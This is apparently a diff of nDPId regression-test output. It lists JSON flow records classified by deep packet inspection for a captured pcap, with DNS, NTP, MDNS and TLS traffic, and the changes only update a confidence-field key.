+00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077620,"flow_last_seen":1626168077673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2155,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077660,"flow_last_seen":1626168077704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":217,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168079361,"flow_last_seen":1626168079391,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075993,"flow_last_seen":1626168077017,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1626168078653,"flow_last_seen":1626168079674,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080732,"flow_last_seen":1626168080762,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080092,"flow_last_seen":1626168080122,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1626168075664,"flow_last_seen":1626168076674,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":1180,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1626168078673,"flow_last_seen":1626168079052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29308,"flow_avg_l4_payload_len":407,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1626168078673,"flow_last_seen":1626168078826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17628,"flow_avg_l4_payload_len":326,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1626168078653,"flow_last_seen":1626168079674,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080732,"flow_last_seen":1626168080762,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080092,"flow_last_seen":1626168080122,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1626168075664,"flow_last_seen":1626168076674,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":1180,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1626168078673,"flow_last_seen":1626168079052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29308,"flow_avg_l4_payload_len":407,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1626168078673,"flow_last_seen":1626168078826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17628,"flow_avg_l4_payload_len":326,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} 00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077469,"flow_last_seen":1626168077750,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168077506,"flow_last_seen":1626168077753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079158,"flow_last_seen":1626168079311,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079191,"flow_last_seen":1626168079355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079905,"flow_last_seen":1626168080098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079937,"flow_last_seen":1626168080098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080539,"flow_last_seen":1626168080694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080569,"flow_last_seen":1626168080730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077750,"flow_last_seen":1626168077780,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077469,"flow_last_seen":1626168077750,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168077506,"flow_last_seen":1626168077753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079158,"flow_last_seen":1626168079311,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 